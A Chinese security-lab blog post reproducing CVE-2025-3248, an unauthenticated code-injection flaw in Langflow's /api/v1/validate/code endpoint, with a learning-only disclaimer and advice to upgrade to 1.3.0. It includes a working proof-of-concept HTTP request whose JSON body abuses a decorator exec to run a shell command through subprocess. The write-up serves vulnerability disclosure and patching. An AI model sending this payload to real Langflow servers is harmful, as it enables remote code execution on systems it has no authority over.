【成功复现】Langflow框架远程命令执行漏洞(CVE-2025-3248)

原创 弥天安全实验室 弥天安全实验室 2025-04-25 13:39

网安引领时代，弥天点亮未来  

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！
0x01漏洞介绍Langflow是Langflow开源的一个用于构建多代理和 RAG 应用程序的可视化框架。‌是一个面向开发者的低代码工具，专注于多智能体人工智能、提示工程和检索增强生成（RAG）应用的开发。它能够帮助开发者轻松构建强大的AI智能体和工作流，通过可视化方式搭建AI应用，通过拖放操作创建复杂的AI工作流，从而降低开发门槛，减少编写样板代码的工作量，使开发者能够更多地专注于创新‌。Langflow 1.3.0之前版本存在安全漏洞，该漏洞源于/api/v1/validate/code端点存在代码注入漏洞，可能导致远程未经验证的攻击者执行任意代码。注：2025年4月7日，Langflow AI 发布了补丁，修复了身份认证绕过漏洞。0x02影响版本

langflow<1.3.0

0x03漏洞复现
1.访问漏洞环境

2.对漏洞进行复现 POC 漏洞复现POST /api/v1/validate/code HTTP/1.1Host: 127.0.0.1Content-Type: application/jsonContent-Length: 125{“code”: “@exec(‘raise Exception(import(\”subprocess\”).check_output([\”id\”]))’)\ndef foo():\n  pass”}      执行命令，通过响应判断漏洞存在。3.Yakit插件测试0x04修复建议目前厂商已发布升级补丁以修复漏洞，补丁获取链接：建议尽快升级修复漏洞，再次声明本文仅供学习使用，非法他用责任自负！https://github.com/langflow-ai/langflow/releases/tag/1.3.0https://www.exploit-db.com/exploits/52262弥天简介学海浩茫，予以风动，必降弥天之润！弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。口号 网安引领时代，弥天点亮未来 知识分享完了喜欢别忘了关注我们哦~学海浩茫，予以风动，必降弥天之润！   弥  天安全实验室